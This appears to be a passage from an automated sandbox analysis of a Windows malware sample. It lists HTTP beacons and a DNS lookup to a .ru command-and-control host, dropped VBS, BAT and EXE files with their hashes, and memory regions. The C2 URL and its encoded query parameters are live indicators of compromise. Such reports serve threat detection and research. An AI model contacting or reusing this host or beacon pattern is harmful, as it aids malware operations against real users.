                              GET http://81888.cllt.nyashteam.ru/nyashsupport.php?8Wan=9oyLDaB6scvLSMJxTQ7iQ7xuhy6mn&279rk=JetOkZ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&8Wan=9oyLDaB6scvLSMJxTQ7iQ7xuhy6mn&279rk=JetOkZ

                              HTTP Response

                              404

                              HTTP Request

                              GET http://81888.cllt.nyashteam.ru/nyashsupport.php?8Wan=9oyLDaB6scvLSMJxTQ7iQ7xuhy6mn&279rk=JetOkZ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&8Wan=9oyLDaB6scvLSMJxTQ7iQ7xuhy6mn&279rk=JetOkZ

                              HTTP Response

                              404
                            • 8.8.8.8:53
                              81888.cllt.nyashteam.ru
                              dns
                              lsm.exe
                              69 B
                              101 B
                              1
                              1

                              DNS Request

                              81888.cllt.nyashteam.ru

                              DNS Response

                              104.21.2.8
                              172.67.186.200

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\4a51d27aaaa0bb67872d99147bae13d0N.exe

                              Filesize

                              4.9MB

                              MD5

                              4a51d27aaaa0bb67872d99147bae13d0

                              SHA1

                              a2b4c8f679911bc03a14e4f9be242ef9b0e4d97d

                              SHA256

                              9636a592ea745fc8173b9ec8527f94fc8733ca1157837009ead6ed97293e2d5e

                              SHA512

                              e208fb10b57ff8dcec352887ac8221bf348af5dbdae73ab1cd6885edbce26a2e81d96bf6f89bd5e482e30c2016fb73172eb714e3f77bebfe43bbd98bed381b6d

                            • C:\Users\Admin\AppData\Local\Temp\1730fbff-42f3-4cf2-b3bc-2f5660e183e0.vbs

                              Filesize

                              700B

                              MD5

                              4a24e436d289d206d0f5241cbad25bd2

                              SHA1

                              2d2a42ebd01cf604a22082879ed962dd99dcc7c4

                              SHA256

                              1b10ec4a74865c34c0b186b96686b6c55ea1593079b94ba4d3d57ccf0b6a90c1

                              SHA512

                              dfffc4a4da680952f416d5497a375524179b604e59fb88c31b8e7242652b3d02b0b88cd0a2d5c97bfbf74ea4a4cf6e2adfbe5e0824103e39031eb6c11beacee9

                            • C:\Users\Admin\AppData\Local\Temp\34a6af7f-ca3d-40c8-83fa-179d91ed9120.vbs

                              Filesize

                              700B

                              MD5

                              ad0303fc1b3a3f4f41adb5877145867c

                              SHA1

                              6b27db52c738b4f01362fb2cfa2baaf923ef0924

                              SHA256

                              d210679ec5919d4080e9207d69b59910ac3906b67955d6c892f08f3eae39a455

                              SHA512

                              54231457434cdcc4ee7cb35b533f47f94e58b50a020fc7b75905d4af951cf05a7fc29a91c384db79daacc6d79ef9f936fd840528180de2dc5f61233ec08a0b53

                            • C:\Users\Admin\AppData\Local\Temp\40462058-980b-4cf3-aec0-367861db6309.vbs

                              Filesize

                              700B

                              MD5

                              6d42b7671773b7fa4705f2bf9ee9084e

                              SHA1

                              9ea7a882c6c7ba493bc58806251ef35be4526fff

                              SHA256

                              172b7f5bb6daa98a13040e5838e5a69f6e35c5dd3e8a4fd24b1f5c0943709d6e

                              SHA512

                              22aabb4c440c0a9601b8e1fcba0e956c594e9a57a294611ef12f845deb29e6d403d81d3379b60ce26a647b139a01a33647d84c654027d1551e9c8a5c4fad1988

                            • C:\Users\Admin\AppData\Local\Temp\74763952-74bb-4108-96ad-56685b50acd1.vbs

                              Filesize

                              700B

                              MD5

                              0c06bfc409e43b02553579e2fcd0e9a5

                              SHA1

                              e28f756f80b12725db803f29de65f053f1a35a88

                              SHA256

                              e2dbc383751e9df30442343f6e7380eb1da0833373f8c3b07889774e74429e90

                              SHA512

                              24d55caef9a4ec5301001f5baf1b64869c4bffdc62cad45f2b4eeb684e80492201ce35a2a187b2cdcdf559e2d8eb8467d7739c1817753b8bb656866320a6e2f5

                            • C:\Users\Admin\AppData\Local\Temp\77c07c7f-ddf3-4b5e-a63e-e3d35fc75a06.vbs

                              Filesize

                              700B

                              MD5

                              2d0888e33f8ee54e9869142b7c8a6313

                              SHA1

                              5e4f80c53fc91ece50fb0d754187d34b4da734b5

                              SHA256

                              f8826cef2fa3f6f10e7e5c09161e80aaffc8c04a9b211114da9aff4ce8cc4942

                              SHA512

                              5d2269813913af79c49125694243fa0cd7593fc261342c6b1077a3f1f9174c313e54018990a922e78000a6f2dff24bcbbbd6e26e93acc347aeab66628f096743

                            • C:\Users\Admin\AppData\Local\Temp\790ae7fb75235c796e49c039207532319cbc2f9f.exe

                              Filesize

                              4.9MB

                              MD5

                              9456c9aff51a36c653106ea197ec4b6d

                              SHA1

                              d7e95a8f6dedde0edf2725549365e1a954423f1e

                              SHA256

                              5886a62d34042ac2c26625108f6ec6070642dcbd40800a05d33e4814e3f7a08c

                              SHA512

                              1e78ea11f804d2820f5a6a6eb18ff2aa846a59cb7dbd157e39eec8720bf4a158bf0d6c8c5e3dfbc3d20185424ec4d470d529849ab7e24d7d239cfa8ba4b62b54

                            • C:\Users\Admin\AppData\Local\Temp\95765e55-f5c6-428e-a6cb-07fd844c8ab0.vbs

                              Filesize

                              700B

                              MD5

                              db4958e9890145ddbc8cf312f0550d9a

                              SHA1

                              8a99ad9103a9ca2d4888194b2381a3eaeb2500c0

                              SHA256

                              10a625ba79067425639e7b51925e65be491cd764e49f24aa08192b5e7358d183

                              SHA512

                              19d0a7bc7b1e70abe4d91beb6c343095ebc0b09331e3b03a57112ab33d066a4a4d8025a1874e1f683b3adeef511253262e4fe25d6ad2bd3a6f7988e53a425ccf

                            • C:\Users\Admin\AppData\Local\Temp\VNwVo2iwMr.bat

                              Filesize

                              189B

                              MD5

                              2dfe198bfa0e7112f3475c9432a33130

                              SHA1

                              3b6eb71306ee9895170fef54aaf5a6f210c16aaf

                              SHA256

                              7c4915f13995fe1c3ca587b9b6118dcafd06148519938c50fb9cd9982be818f6

                              SHA512

                              7bb6c9a37f958efb711c9e86e6bfcfd9ec2195bd275fe9edac4362c44f984cf8d39cbadd8887a7e4bf13a736e259880b403563556884f0dc7e065082e2c79a3d

                            • C:\Users\Admin\AppData\Local\Temp\aae0aa8a-2995-46f4-be4c-59474ac78cc7.vbs

                              Filesize

                              476B

                              MD5

                              ec4594c4689fe9a7db1f7912f6dccb33

                              SHA1

                              d1529aee3514deb6414b214ceee7fe156083066d

                              SHA256

                              1f310d1fdc12b0e4cf43afdb96e5a745bb5877bad7a4c21044c846d34e9ed03e

                              SHA512

                              70dbfe182304e0a56776d2596a7526a2e3ff81c712a55555615956dc08f63974808fe8dbe6c78d60451ba49019efffd44465462435244d5b43bf55c27d896b4f

                            • C:\Users\Admin\AppData\Local\Temp\e07ed1f8-d307-452d-9851-72fc6a525d85.vbs

                              Filesize

                              700B

                              MD5

                              767bbfa83ca031126a401c59c6f31a04

                              SHA1

                              b2a25351e14ed466b434e1af210265d66746ffab

                              SHA256

                              9423a01963eb6d48788e1f85513cb10feaf4f80fe6ffe0650ebadb316c8cf8c8

                              SHA512

                              ca74dfb226bd94bb8769ebd51652df72fceb3f7e3d6f2e688aa10e8b59e4e2b16f937a0e31e546472b04d68b1cd37052e20790e0334fe37b42a53ef37001f8d7

                            • C:\Users\Admin\AppData\Local\Temp\tmpCFCD.tmp.exe

                              Filesize

                              75KB

                              MD5

                              e0a68b98992c1699876f818a22b5b907

                              SHA1

                              d41e8ad8ba51217eb0340f8f69629ccb474484d0

                              SHA256

                              2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

                              SHA512

                              856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                              Filesize

                              7KB

                              MD5

                              1e91f48541cdb85966439a20a4acf404

                              SHA1

                              129a895827c0eaa6f2891f85bf8e344a358f0d09

                              SHA256

                              5c2cae5570f0d7b71b7d3b1e9fd21b0a1b796b47c3e7f9b1a77439df9b738c2f

                              SHA512

                              061fd73a7f42882addb6ff8ac8413b9f3de116a09e46c364c6882fc074b7393de15e3ff2c9e1f6fcba840b89e748a57d9bcf4e5ad8412e947a9aa287ac5f7c00

                            • memory/1684-184-0x00000000003A0000-0x0000000000894000-memory.dmp

                              Filesize

                              5.0MB

                            • memory/1844-258-0x0000000000370000-0x0000000000864000-memory.dmp

                              Filesize

                              5.0MB

                            • memory/2140-9-0x0000000000600000-0x000000000060A000-memory.dmp

                              Filesize

                              40KB

                            • memory/2140-5-0x00000000003A0000-0x00000000003A8000-memory.dmp

                              Filesize

                              32KB

                            • memory/2140-12-0x0000000000630000-0x000000000063E000-memory.dmp

                              Filesize

                              56KB

                            • memory/2140-77-0x000007FEF4F03000-0x000007FEF4F04000-memory.dmp

                              Filesize

                              4KB

                            • memory/2140-105-0x000007FEF4F00000-0x000007FEF58EC000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/2140-0-0x000007FEF4F03000-0x000007FEF4F04000-memory.dmp

                              Filesize

                              4KB

                            • memory/2140-1-0x00000000010E0000-0x00000000015D4000-memory.dmp

                              Filesize

                              5.0MB

                            • memory/2140-144-0x000007FEF4F00000-0x000007FEF58EC000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/2140-2-0x000000001B160000-0x000000001B28E000-memory.dmp

                              Filesize

                              1.2MB

                            • memory/2140-11-0x0000000000620000-0x000000000062A000-memory.dmp

                              Filesize

                              40KB

                            • memory/2140-15-0x0000000000D70000-0x0000000000D78000-memory.dmp

                              Filesize

                              32KB

                            • memory/2140-8-0x00000000003C0000-0x00000000003D0000-memory.dmp

                              Filesize

                              64KB

                            • memory/2140-16-0x0000000000D80000-0x0000000000D8C000-memory.dmp

                              Filesize

                              48KB

                            • memory/2140-3-0x000007FEF4F00000-0x000007FEF58EC000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/2140-10-0x0000000000610000-0x0000000000622000-memory.dmp

                              Filesize

                              72KB

                            • memory/2140-7-0x00000000005E0000-0x00000000005F6000-memory.dmp

                              Filesize

                              88KB

                            • memory/2140-14-0x0000000000BD0000-0x0000000000BD8000-memory.dmp

                              Filesize

                              32KB

                            • memory/2140-6-0x00000000003B0000-0x00000000003C0000-memory.dmp

                              Filesize

                              64KB

                            • memory/2140-4-0x0000000000380000-0x000000000039C000-memory.dmp

                              Filesize

                              112KB

                            • memory/2140-13-0x0000000000BC0000-0x0000000000BCE000-memory.dmp

                              Filesize

                              56KB

                            • memory/2308-145-0x0000000001F20000-0x0000000001F28000-memory.dmp

                              Filesize

                              32KB

                            • memory/2308-142-0x000000001B280000-0x000000001B562000-memory.dmp

                              Filesize

                              2.9MB

                            • memory/2376-198-0x00000000002D0000-0x00000000007C4000-memory.dmp

                              Filesize

                              5.0MB

                            • memory/2448-213-0x00000000011E0000-0x00000000016D4000-memory.dmp

                              Filesize

                              5.0MB

                            • memory/2644-273-0x0000000000FC0000-0x00000000014B4000-memory.dmp

                              Filesize

                              5.0MB

                            • memory/2656-243-0x0000000001340000-0x0000000001834000-memory.dmp

                              Filesize

                              5.0MB

                            • memory/2848-228-0x0000000000C40000-0x0000000000C52000-memory.dmp

                              Filesize

                              72KB

                            We care about your privacy.

                            This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.